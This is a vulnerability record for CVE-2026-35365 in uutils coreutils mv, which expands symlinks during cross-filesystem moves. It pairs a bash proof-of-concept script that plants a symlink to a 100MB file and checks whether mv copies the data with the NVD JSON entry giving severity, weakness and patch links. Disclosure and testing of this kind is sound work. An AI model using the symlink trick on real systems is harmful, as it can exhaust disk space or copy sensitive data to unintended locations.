CVE-2026-35365

#!/bin/bash # PoC for CVE-2026-35365: uutils coreutils mv symlink dereference # This script demonstrates the issue where mv copies the target of a symlink # instead of the symlink itself when moving across filesystem boundaries. # 1. Create a large dummy file to simulate resource exhaustion target mkdir -p /tmp/large_target dd if=/dev/zero of=/tmp/large_target/bigfile.bin bs=1M count=100 status=none # 2. Create a source directory (assuming /tmp is on a different partition than /home for real cross-fs test) # For demonstration, we will simulate the scenario. In a real exploit, ensure src and dst are different mounts. SRC_DIR="/tmp/poc_exploit_src" mkdir -p "$SRC_DIR" # 3. Create a malicious symlink pointing to the large data ln -s /tmp/large_target "$SRC_DIR/malicious_link" echo "[+] Directory structure created." echo " Source: $SRC_DIR" echo " Symlink: $SRC_DIR/malicious_link -> /tmp/large_target" # 4. Execute the move operation (using uutils mv) # If /tmp and /var are on different filesystems, this triggers the bug. # Adjust DEST_DIR to a different mount point to verify the exploit. DEST_DIR="/var/tmp/poc_exploit_dst" echo "[+] Attempting to move $SRC_DIR to $DEST_DIR..." echo "[!] If vulnerable, 'mv' will start copying 100MB of data instead of moving the link." # Note: Replace 'mv' with full path to uutils mv if testing specifically against that binary mv "$SRC_DIR" "$DEST_DIR" # 5. Check the result if [ -L "$DEST_DIR/malicious_link" ]; then echo "[+] SAFE: Symlink was preserved." elif [ -f "$DEST_DIR/malicious_link/bigfile.bin" ]; then echo "[!] VULNERABLE: Symlink was dereferenced. Data was copied." du -sh "$DEST_DIR/malicious_link" else echo "[-] Test failed to verify." fi # Cleanup rm -rf /tmp/large_target /var/tmp/poc_exploit_dst

{"cve": {"id": "CVE-2026-35365", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:39.900", "lastModified": "2026-05-04T18:53:45.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mv utility in uutils coreutils improperly handles directory trees containing symbolic links during moves across filesystem boundaries. Instead of preserving symlinks, the implementation expands them, copying the linked targets as real files or directories at the destination. This can lead to resource exhaustion (disk space or time) if symlinks point to large external directories, unexpected duplication of sensitive data into unintended locations, or infinite recursion and repeated copying in the presence of symlink loops."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.7.0", "matchCriteriaId": "7F64F6A4-00A5-4FB8-BB51-21F475C11FF2"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/10546", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.7.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}